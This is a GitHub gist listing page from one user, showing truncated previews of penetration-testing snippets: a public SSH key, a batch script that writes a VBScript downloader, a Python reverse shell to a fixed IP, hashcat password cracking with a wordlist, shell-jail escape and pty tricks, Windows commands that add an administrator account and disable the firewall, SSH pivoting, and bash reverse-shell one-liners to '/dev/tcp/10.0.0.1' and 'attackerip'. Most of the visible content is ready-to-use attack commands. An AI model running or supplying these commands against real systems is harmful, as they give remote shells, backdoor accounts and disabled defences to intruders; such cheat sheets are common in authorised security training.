Skip to content

Instantly share code, notes, and snippets.

Ryan Bentz sckalath

View GitHub Profile
@sckalath
sckalath / pub.txt
Created Jul 14, 2015
My public key
View pub.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland
View pub.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland
View pub.txt
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzIVkme1S+n58q3PjhTkxhS2jKR5MFThGdsUkJyh7Za5QvhB3arNbDvhLY/bB6b9LYpL/mEUTGJ+4hmcdTVj9Yq2QhItW/0DneTANbdtMUWYMMpTgrnQxKjF/eIp0CuLymLWkUuP/FtsfwTLQ4knZNdelg9N+r5FJDS0tbwPDgL2By+uFIXSsQXvpd0kOvGgMJ8x1m6bsjDZLYfflexFaZrVABES5d9DiyWCRFG5F3l3AzP1vP5llqS0Qyw0CNaUIfOLXDKmHN01ICWHpv1uFDFWI2FIGVoKTy1IX+pFE0noZJz5t2E2DIWrceuzUFcTuv2gvIv0IZ3sOkEG9x8hEB ryan@garland
@sckalath
sckalath / wget_vbs
Last active Mar 10, 2019
wget vbscript
View wget_vbs
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
@sckalath
sckalath / simple_py_shell
Created Nov 7, 2014
Simple Python Shell
View simple_py_shell
#!/usr/bin/python
# imports here
# Copyright 2012 TrustedSec, LLC. All rights reserved.
#
# This piece of software code is licensed under the FreeBSD license..
#
# Visit http://www.freebsd.org/copyright/freebsd-license.html for more information.
import socket,subprocess
HOST = '192.168.12.45' # The remote host
PORT = 443 # The same port as used by the server
View password_cracking
#cracks md5(unix) hash, places found passwords in found.txt, removes them from the hasth list and uses the rockyou wordlist
hashcat -m 500 -a 0 -o found.txt --remove hashes.txt /usr/share/wordlist/rockyou.txt
View tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
@sckalath
sckalath / windows_crap
Last active Oct 29, 2018
windows crap
View windows_crap
#add a user
net user ryan mwcb /add
#add user to local administrators
net localgroup administrators /add ryan
#remove firewall
netsh firewall set opmode disable
#enabled remote desktop
@sckalath
sckalath / ssh_tricks
Last active Oct 29, 2018
ssh kung fu
View ssh_tricks
##SOCKS Proxy##
#Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host (10.0.0.1):
#Command line:
ssh -D 127.0.0.1:1080 10.0.0.1
#~/.ssh/config:
Host 10.0.0.1
DynamicForward 127.0.0.1:1080
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from 10.0.0.1:
View reverse_shells
#bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
#bash alt
exec /bin/bash 0&0 2>&0
#bash alt 2
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
#bash alt 3
You can’t perform that action at this time.